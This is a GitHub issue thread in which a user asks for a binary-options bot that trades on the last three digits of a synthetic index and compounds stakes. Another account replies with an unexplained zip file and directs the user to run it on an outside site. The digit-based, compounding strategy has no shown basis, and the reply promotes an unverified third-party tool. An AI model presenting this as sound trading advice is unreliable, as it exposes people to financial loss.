### ISSUE TITLE
Analyse last three digits and compounding strategy

### ISSUE THREAD

**Issue by Alonzo3** [binary-com/binary-bot#3651]
Hi... Can I get a help to analyse last 3 digits for Vix 50 on every ticks? Ex: 546.1914 I want to analyse last 3 digits (914) Here is the strategy  If last 3 digits is in the range of 900 to 990 such as the (914) above, I want to purchase higher/lower. And also compound the profit & the initial stake and stake it as new stake. How to set it on binary bot? Please give me advice.
@binary-ex-machina
@derivmaster

**Comment by derivmaster** [comment]
Hey my friend @Alonzo3 was a difficult job but is READY !! totally free for you 

Compounding the Profit & open higuer/lower in the range 900 to 990

![image](https://user-images.githubusercontent.com/107600731/175757312-b0f2d6ad-bf64-45aa-998d-6d2f712de35b.png)

![image](https://user-images.githubusercontent.com/107600731/175757374-d2b29185-35cd-4740-940b-b2a591a07778.png)

[COMPOUND HIGUER_LOWER v1.0 BY BINARYTOOLS.zip](https://github.com/binary-com/binary-bot/files/8983830/COMPOUND.HIGUER_LOWER.v1.0.BY.BINARYTOOLS.zip)


Remember RUN the bot here 👉🏻 BOT.BINARYTOOLS.IO

![image](https://user-images.githubusercontent.com/107600731/175757326-88ae9413-f5c8-4076-845b-5ab95d99c488.png)

**Comment by Alonzo3** [comment]
> Hey my friend @Alonzo3 was a difficult job but is READY !! totally free for you 
> 
> Compounding the Profit & open higuer/lower in the range 900 to 990
> 
> ![image](https://user-images.githubusercontent.com/107600731/175757312-b0f2d6ad-bf64-45aa-998d-6d2f712de35b.png)
> 
> ![image](https://user-images.githubusercontent.com/107600731/175757374-d2b29185-35cd-4740-940b-b2a591a07778.png)
> 
> [COMPOUND HIGUER_LOWER v1.0 BY BINARYTOOLS.zip](https://github.com/binary-com/binary-bot/files/8983830/COMPOUND.HIGUER_LOWER.v1.0.BY.BINARYTOOLS.zip)
> 
> 
> Remember RUN the bot here 👉🏻 BOT.BINARYTOOLS.IO
> 
> ![image](https://user-images.githubusercontent.com/107600731/175757326-88ae9413-f5c8-4076-845b-5ab95d99c488.png)
> 
> 

Tnks Alot Sir, my apologies for just replying you now, i was unwell and been away from internet activities, just got better
